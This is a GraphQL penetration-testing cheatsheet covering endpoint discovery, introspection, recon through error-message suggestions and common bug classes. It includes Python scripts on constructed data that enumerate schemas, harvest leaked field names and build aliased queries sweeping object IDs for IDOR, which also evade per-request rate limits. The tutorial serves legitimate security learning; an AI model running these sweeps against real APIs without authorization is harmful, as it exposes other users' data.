GraphQL cheatsheet

What GraphQL Is

  • A query language for APIs; it is often compared to SQL, but it queries a typed API schema, not a database directly
  • Usually exposed through a single endpoint (typically POST /graphql) to which clients send structured queries
  • The client decides exactly which fields come back, so one request can pull related objects that REST would spread over several endpoints
  • Common in modern applications

Key characteristics

  • Flexible queries
  • Strongly typed, structured schema
  • Client-controlled responses
  • Graph-based data relationships

Some common paths where GraphQL endpoints (and their IDE consoles, which are often left enabled in production) turn up:

  • /v1/*
  • /v2/*
  • /beta/*
  • /graph
  • /gql
  • /graphql
  • /graphql/console
  • /graphql.php
  • /graphiql
  • /graphiql.php

Where to find GraphQL?

  • In the same places you find other APIs
  • Tends to be more common in newer applications
    • Yahoo, Shopify and HackerOne all use GraphQL
  • GraphQL is usually located at specific endpoints
    • gql, graphql, graphiql, graphql/console
  • Also look out for requests/responses referencing queries or mutations, or a JSON body with "query", "variables" and "operationName" keys

How does GraphQL work?

  • GraphQL is not itself a database; it exposes the data as a graph of typed objects, and server-side resolvers map each field onto whatever backend actually stores it
  • There are queries and mutations
    • Queries fetch data
    • Mutations create, update or delete data
  • Fragments are reusable sets of fields that several queries can share
  • Meta fields (names starting with a double underscore, e.g. __typename, __schema, __type) let you inspect the schema itself

Graph Structure

  • We usually represent data as tables or spreadsheets
  • But we often link two different tables together using IDs (foreign keys)
  • We can still think of it as flat structures
  • But the natural form of this data is a graph, and that is what GraphQL lets you traverse in a single query

Queries

  • Queries in GraphQL are written to be flexible
  • You can request any field easily, including related entities on the graph, and then fields of that entity, nesting as deep as the schema allows
  • Fields are written like function calls and can take arguments (IDs, filters, pagination)
  • Can return a single object or a list
  • Very structured: the response JSON mirrors the shape of the query

An example introspection query that lists every type name in the schema (a full introspection query also asks for each type's fields, arguments and return types):

query Introspection {
	__schema{
		types{
			name
		}
	}
}

Mutations

While queries fetch data, a mutation changes it

  • Create, update or delete operations, usually taking arguments or variables for the new values
  • A mutation also has a selection set, so you can read the object back after modifying it

Edges & nodes

  • node - an object carrying data
  • edge - the connection between two nodes (in connection-style pagination an edge also carries a cursor)

Fragments and meta fields

  • Fragments let you define a list of fields once and have several queries (or several aliased fields in one query) reuse the same list
  • Handy for comparing the same object fetched through different paths
  • Meta fields let you inspect the API: __typename returns the type name of the object it is queried on, __schema and __type return the schema itself
  • Extremely important for introspection queries!

  • Introspection: how to find all the mutations and queries
    • The API will tell you, if introspection is enabled
    • GraphQL Voyager is a tool that visualizes the introspection output as a graph
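Once introspection succeeds, the interesting part is reading the result: which root queries and mutations exist, which take a caller-supplied ID (IDOR candidates) and which object fields look like they should never reach a client. The following is an added example, not code from the original cheatsheet or from any tool it lists; it works on a constructed, hypothetical introspection response (Query/Mutation/User/Invoice types) of the shape a full introspection query returns, and the sensitive-name markers are an assumption you would tune per target.

```python
# Constructed sample: the parsed JSON of an introspection response, i.e. the
# answer to a query asking for __schema { queryType mutationType types { kind
# name fields { name args { name type {...} } type {...} } } }.
# The schema (Query/Mutation/User/Invoice) is hypothetical, not a real target.
SAMPLE_INTROSPECTION = {"data": {"__schema": {
    "queryType": {"name": "Query"},
    "mutationType": {"name": "Mutation"},
    "types": [
        {"kind": "OBJECT", "name": "Query", "fields": [
            {"name": "me", "args": [],
             "type": {"kind": "OBJECT", "name": "User", "ofType": None}},
            {"name": "user",
             "args": [{"name": "id", "type": {"kind": "NON_NULL", "name": None,
                       "ofType": {"kind": "SCALAR", "name": "ID", "ofType": None}}}],
             "type": {"kind": "OBJECT", "name": "User", "ofType": None}},
            {"name": "invoices",
             "args": [{"name": "accountId",
                       "type": {"kind": "SCALAR", "name": "Int", "ofType": None}}],
             "type": {"kind": "LIST", "name": None,
                      "ofType": {"kind": "OBJECT", "name": "Invoice", "ofType": None}}}]},
        {"kind": "OBJECT", "name": "Mutation", "fields": [
            {"name": "deleteUser",
             "args": [{"name": "id", "type": {"kind": "NON_NULL", "name": None,
                       "ofType": {"kind": "SCALAR", "name": "ID", "ofType": None}}}],
             "type": {"kind": "SCALAR", "name": "Boolean", "ofType": None}}]},
        {"kind": "OBJECT", "name": "User", "fields": [
            {"name": "id", "args": [], "type": {"kind": "SCALAR", "name": "ID", "ofType": None}},
            {"name": "email", "args": [], "type": {"kind": "SCALAR", "name": "String", "ofType": None}},
            {"name": "passwordHash", "args": [], "type": {"kind": "SCALAR", "name": "String", "ofType": None}}]},
        {"kind": "OBJECT", "name": "Invoice", "fields": [
            {"name": "id", "args": [], "type": {"kind": "SCALAR", "name": "ID", "ofType": None}},
            {"name": "total", "args": [], "type": {"kind": "SCALAR", "name": "Float", "ofType": None}}]},
        {"kind": "OBJECT", "name": "__Schema", "fields": []},
    ]}}}


def type_name(t):
    """Render a type reference the way SDL writes it: ID!, [Invoice], String."""
    if t is None:
        return "?"
    if t["kind"] == "NON_NULL":
        return type_name(t["ofType"]) + "!"
    if t["kind"] == "LIST":
        return "[" + type_name(t["ofType"]) + "]"
    return t["name"]


def root_operations(result):
    """{'query': [...], 'mutation': [...]} of (field, {arg: type}, return type)."""
    schema = result["data"]["__schema"]
    types = {t["name"]: t for t in schema["types"]}
    ops = {}
    for key, root in (("query", schema.get("queryType")),
                      ("mutation", schema.get("mutationType"))):
        ops[key] = []
        if not root:
            continue  # e.g. a read-only API that defines no Mutation type
        for f in types[root["name"]].get("fields") or []:
            args = {a["name"]: type_name(a["type"]) for a in f.get("args") or []}
            ops[key].append((f["name"], args, type_name(f["type"])))
    return ops


def to_sdl(result):
    """Rebuild the root types as schema-definition-language lines for reading."""
    lines = []
    for key, fields in root_operations(result).items():
        lines.append(f"type {key.capitalize()} {{")
        for name, args, ret in fields:
            arglist = ", ".join(f"{a}: {t}" for a, t in args.items())
            lines.append(f"  {name}({arglist}): {ret}" if arglist else f"  {name}: {ret}")
        lines.append("}")
    return "\n".join(lines)


def idor_candidates(result):
    """Root fields taking a caller-supplied identifier: the first stops for IDOR testing."""
    hits = []
    for key, fields in root_operations(result).items():
        for name, args, _ in fields:
            for arg, typ in args.items():
                base = typ.rstrip("!").strip("[]")
                if base == "ID" or arg.lower().endswith("id"):
                    hits.append(f"{key}.{name}({arg}: {typ})")
    return hits


def sensitive_fields(result, markers=("password", "token", "secret", "hash", "ssn")):
    """Object fields whose names suggest data that should never be client-visible.
    The marker list is an assumption; extend it per target."""
    hits = []
    for t in result["data"]["__schema"]["types"]:
        if t["kind"] != "OBJECT" or t["name"].startswith("__"):
            continue  # skip GraphQL's own introspection types
        for f in t.get("fields") or []:
            if any(m in f["name"].lower() for m in markers):
                hits.append(f'{t["name"]}.{f["name"]}')
    return hits


if __name__ == "__main__":
    print(to_sdl(SAMPLE_INTROSPECTION))
    print("IDOR candidates:", idor_candidates(SAMPLE_INTROSPECTION))
    print("Sensitive-looking fields:", sensitive_fields(SAMPLE_INTROSPECTION))
```

In practice you would feed the script the parsed JSON of a real introspection response; the same walk over `__schema.types` is what GraphQL Voyager and InQL do before drawing their graphs.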

How to do more traditional recon:

  • Even if introspection is turned off we can still do recon to find queries and fields
  • Click through the app, figure out the structure of the queries it sends, swap in likely entity or field names, or just probe visible gql endpoints with a wordlist
  • Keep an eye out for:
    • Any documentation; this is likely to list gql endpoints
    • Error messages: many servers will tell you a field does not exist and suggest the closest valid name ("Did you mean ...?")
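The "Did you mean" hint is the workhorse of recon with introspection disabled: graphql-js based servers validate the whole document before executing it and report every unknown field, so one request can test a wordlist and each complaint may leak nearby valid names. The code below is an added example, not from the original cheatsheet or any listed tool; the error messages are constructed in the graphql-js wording and the field names (usr, user, account, ...) are hypothetical.

```python
import re

# Constructed sample: the "errors" array a graphql-js based server returns
# when a probe query names fields and arguments that do not exist.
# Hypothetical target; nothing here was captured from a real system.
SAMPLE_ERRORS = {
    "errors": [
        {"message": 'Cannot query field "usr" on type "Query". Did you mean "user" or "users"?'},
        {"message": 'Cannot query field "acount" on type "User". '
                    'Did you mean "account", "accounts", or "accountId"?'},
        {"message": 'Unknown argument "ids" on field "Query.user". Did you mean "id"?'},
        {"message": 'Cannot query field "zzzz" on type "Query".'},  # no hint leaked
    ]
}

DID_YOU_MEAN = re.compile(r'Did you mean (.+?)\?')
QUOTED = re.compile(r'"([^"]+)"')
FIELD_ON_TYPE = re.compile(r'Cannot query field "[^"]+" on type "([^"]+)"')
ARG_ON_FIELD = re.compile(r'Unknown argument "[^"]+" on field "([^"]+)"')


def probe_query(type_fields):
    """Build one query that tries many guessed field names at once.

    type_fields maps a path (tuple of field names from the root) to the
    guesses to place at that level; () means the root Query type.  Because
    validation reports every unknown field, a single request tests them all.
    """
    def render(path, guesses):
        body = " ".join(guesses)
        for field in reversed(path):
            body = f"{field} {{ {body} }}"
        return body
    return "query Probe { " + " ".join(render(p, g) for p, g in type_fields.items()) + " }"


def suggestions_from_errors(response):
    """Map parent type (or Type.field(args) for arguments) -> sorted leaked names."""
    found = {}
    for err in response.get("errors", []):
        msg = err.get("message", "")
        hint = DID_YOU_MEAN.search(msg)
        if not hint:
            continue  # this guess was too far from any real name to earn a hint
        names = QUOTED.findall(hint.group(1))  # only the quoted names after "Did you mean"
        m = FIELD_ON_TYPE.search(msg)
        if m:
            key = m.group(1)
        else:
            m = ARG_ON_FIELD.search(msg)
            key = m.group(1) + "(args)" if m else "?"
        found.setdefault(key, set()).update(names)
    return {k: sorted(v) for k, v in found.items()}


if __name__ == "__main__":
    print(probe_query({(): ["usr", "zzzz"], ("user",): ["acount"]}))
    print(suggestions_from_errors(SAMPLE_ERRORS))
```

Feed each batch of suggestions back in as the next round of guesses and the schema fills itself in. Two caveats: a probe of a field with required arguments (`user` above) also draws a "argument ... is required" error, which leaks the argument name but means the nested guesses may not be validated until you supply it; and servers that have disabled suggestions (or front a WAF that rewrites errors) give you nothing, so fall back to the traffic and documentation clues above.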

Useful applications for recon:

  • A GraphQL IDE such as GraphiQL or GraphQL Playground (often exposed by the target itself)
  • Altair GraphQL IDE (similar to Postman in design)
  • InQL: Burp extension and scanner
  • GraphQLmap
  • graphql-path-enum: walks an introspection result to show how two entities are related

Common GraphQL bugs:

  • Information disclosure (introspection left on, verbose errors, over-fetched fields)
  • IDORs
  • Bypassing client-side restrictions (e.g. a WAF rule written for REST parameters that never looks inside the GraphQL query, letting XSS payloads through)
  • What makes GraphQL special? The syntax
    • The bug classes themselves are the same as in any other API

How to hack a GraphQL API

Your approach should be:

  • Try introspection to find the GraphQL queries and mutations
  • If introspection is turned off, fall back to traditional recon: push buttons, watch the traffic, use wordlists
  • Identify the business logic behind each query and mutation
  • Craft queries to check for:
    • Information disclosure
    • IDORs
    • Permission bypasses
  • Remember the hard part of GraphQL bug hunting is the SYNTAX
  • A great place to practice is the Hacker101 CTF: https://ctf.hacker101.com/auth/login
  • GraphQL documentation: https://graphql.org/learn/
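Because the syntax is the hard part, here is the IDOR check from the list above worked through as an added example (not code from the original cheatsheet): it builds one aliased query that looks up many IDs with variables, shares the selection set through a fragment (the fragment syntax from the earlier section), and sorts the response into objects you own, foreign objects that came back (the IDOR hits) and IDs the server refused. It goes slightly beyond the text in that aliases also sidestep rate limits that count HTTP requests rather than fields. The `user(id: ID!)` field, the `User` type and the sample response are hypothetical.

```python
# Constructed example: sweep a set of object IDs through one aliased GraphQL
# query and flag the ones returned for objects the tester does not own.
# Field, type and variable names (user, User, id, email) are hypothetical.

def build_alias_sweep(ids, field="user", object_type="User", selection="id email"):
    """Return (query, variables) fetching `field` once per ID, each under its own alias.

    One request carries every lookup, which speeds up an IDOR sweep and also
    gets past per-request rate limits that count requests, not fields.  The
    selection set is written once as a fragment and spread into every alias.
    """
    var_defs = ", ".join(f"$id{i}: ID!" for i in range(len(ids)))
    fields = " ".join(f"a{i}: {field}(id: $id{i}) {{ ...Fields }}" for i in range(len(ids)))
    query = (f"query Sweep({var_defs}) {{ {fields} }} "
             f"fragment Fields on {object_type} {{ {selection} }}")
    variables = {f"id{i}": str(v) for i, v in enumerate(ids)}
    return query, variables


def triage_sweep(response, ids, own_ids):
    """Split an aliased response into IDOR hits, the tester's own objects and denied IDs.

    GraphQL reports a per-field authorization failure as null data for that
    alias plus an entry in "errors" whose "path" starts with the alias.
    """
    data = response.get("data") or {}
    denied_aliases = {e["path"][0] for e in response.get("errors", []) if e.get("path")}
    hits, own, denied = [], [], []
    for i, v in enumerate(ids):
        alias = f"a{i}"
        obj = data.get(alias)
        if obj is None or alias in denied_aliases:
            denied.append(str(v))        # server refused or returned nothing
        elif str(v) in own_ids:
            own.append(str(v))           # expected: our own object
        else:
            hits.append(str(v))          # foreign object returned: IDOR candidate
    return {"idor": hits, "own": own, "denied": denied}


# Constructed response as a server might return it for ids 1, 2, 3 when the
# tester owns user 1, user 2 leaks, and user 3 is correctly protected.
SAMPLE_RESPONSE = {
    "data": {
        "a0": {"id": "1", "email": "me@example.test"},
        "a1": {"id": "2", "email": "victim@example.test"},
        "a2": None,
    },
    "errors": [{"message": "Not authorized", "path": ["a2"]}],
}


if __name__ == "__main__":
    query, variables = build_alias_sweep(["1", "2", "3"])
    print(query)
    print(variables)
    # In a real test the JSON body {"query": query, "variables": variables}
    # is POSTed to the endpoint; here the constructed response stands in.
    print(triage_sweep(SAMPLE_RESPONSE, ["1", "2", "3"], own_ids={"1"}))
```

Run the same sweep with two different sessions and diff the `idor` lists: anything a low-privilege user receives that an admin also receives, but that belongs to neither, is the finding. Keep batches modest; some servers cap query complexity or alias count and will reject the whole document rather than part of it.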